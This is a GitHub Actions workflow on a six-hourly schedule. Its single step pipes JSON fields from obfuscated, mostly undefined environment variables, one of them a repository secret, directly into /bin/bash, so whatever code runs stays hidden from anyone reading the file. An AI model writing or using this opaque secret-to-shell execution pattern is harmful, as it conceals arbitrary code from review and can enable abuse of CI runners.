name: shaozihuawan
on:
  workflow_dispatch:
  schedule:
    - cron: '58 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shaozihuawan
        env:
          vxbj25: ${{ secrets.vxbj25 }}
        run: |
          echo $vxbj25 | jq -r .vai725 | /bin/bash
          echo $khzyc7173 | jq -r .ckh26 | /bin/bash
          echo $r626 | jq -r .kj25151 | /bin/bash
          echo $qrc39 | jq -r .gf6715 | /bin/bash
          echo $mypeo4 | jq -r .gxiy7 | /bin/bash
          echo $drbs41575 | jq -r .bcu31 | /bin/bash
          echo $pn04143 | jq -r .mpux40908 | /bin/bash
          echo $bnq9468 | jq -r .vvn03515 | /bin/bash
          echo $sczvw2 | jq -r .rv7 | /bin/bash

